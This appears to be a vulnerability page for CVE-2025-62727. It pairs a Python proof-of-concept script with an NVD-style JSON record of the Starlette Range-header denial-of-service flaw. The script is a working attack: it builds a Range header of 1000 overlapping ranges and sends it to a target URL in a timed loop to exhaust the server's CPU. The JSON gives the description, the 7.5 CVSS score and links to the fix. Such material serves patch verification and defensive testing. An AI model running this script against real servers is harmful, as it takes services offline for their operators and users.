CVE-2025-62727

import httpx import time # CVE-2025-62727 PoC - Starlette FileResponse DoS via Range Header # Target: Starlette application with StaticFiles or FileResponse def exploit_cve_2025_62727(target_url: str, duration: int = 10): """ PoC for CVE-2025-62727 Sends crafted Range header to trigger quadratic-time processing Args: target_url: URL of the vulnerable Starlette endpoint duration: Attack duration in seconds """ # Generate malicious Range header with many overlapping ranges # This triggers O(n²) complexity in Range parsing/merging logic ranges = [] for i in range(1000): # 1000 overlapping ranges ranges.append(f"{i}-{i+100}") range_header = "bytes=" + ",".join(ranges) headers = { "Range": range_header, "User-Agent": "CVE-2025-62727-PoC" } print(f"[*] Starting DoS attack against {target_url}") print(f"[*] Range header length: {len(range_header)} bytes") print(f"[*] Number of ranges: {len(ranges)}") start_time = time.time() attack_count = 0 try: with httpx.Client(timeout=30.0) as client: while time.time() - start_time < duration: try: response = client.get(target_url, headers=headers) attack_count += 1 print(f"[+] Request {attack_count} sent, status: {response.status_code}") except httpx.TimeoutException: print("[!] Request timeout - target may be exhausted") attack_count += 1 except Exception as e: print(f"[!] Error: {e}") except KeyboardInterrupt: print("\n[!] Attack interrupted by user") elapsed = time.time() - start_time print(f"\n[*] Attack completed") print(f"[*] Total requests: {attack_count}") print(f"[*] Duration: {elapsed:.2f} seconds") if __name__ == "__main__": # Example usage target = "http://vulnerable-server:8000/static/large-file.bin" exploit_cve_2025_62727(target, duration=30)

{"cve": {"id": "CVE-2025-62727", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:40.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "references": [{"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5", "source": "[email protected]"}, {"url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c", "source": "[email protected]"}, {"url": "https://github.com/Kludex/starlette/releases/tag/0.49.1", "source": "[email protected]"}, {"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8", "source": "[email protected]"}, {"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}